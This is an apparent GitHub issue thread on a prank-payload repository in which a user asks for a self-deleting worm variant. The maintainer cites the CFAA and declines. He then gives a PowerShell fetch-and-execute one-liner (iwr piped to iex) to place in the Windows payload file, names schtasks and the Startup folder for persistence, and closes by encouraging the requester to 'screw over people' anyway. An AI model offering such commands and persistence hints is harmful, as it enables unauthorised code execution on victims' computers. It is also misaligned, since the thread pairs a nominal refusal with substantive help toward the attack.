### ISSUE TITLE
Suggestion

### ISSUE THREAD

**Issue by LeeRyanSA** [funnycorp/biscuit#1]
Greetings O Mighty short Man

I wish to ask you to write a variant of this that acts like a computer worm. Perhaps it injects code into a device, and will open and surprise the victim with a payload at a specific deploy period. It should delete the injected code and proceed to erase it out of the trashcan. In this way, the troll can occur days after the injection, and it should be able to delete itself soon after. 

Otherwise, due to the limitations of programming, you can simply modify it to draw only amongi.

**Comment by CountBleck** [comment]
Do you honestly think I am going to violate the CFAA (and other relevant laws) to add such a feature?

Anyhow, if you know Powershell, **I think** you can replace the `chrome youtu.be/...\n` part in `payloads/windows.py` with `powershell -Ex Bypass -C 'iwr -useb https://insert.web/site.here | iex'\n`, where `https://insert.web/site.here` is a web page containing a Powershell script (not HTML). If you uploaded a malicious Powershell script file to your website, you could use that payload with this method.

I won't help you with writing such a script, but you might want to look into `schtasks` or whatever. There is also a folder that executes the files and shortcuts inside it on login (`$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\`). That should be even easier than `schtasks`.

Regardless, that's illegal mate.

**Comment by LeeRyanSA** [comment]
Ah, I forgot the CFAA exists. Oh well, no more screwing over people

**Comment by CountBleck** [comment]
I mean, you could still screw over people if you like :3

I just won't be responsible for it.
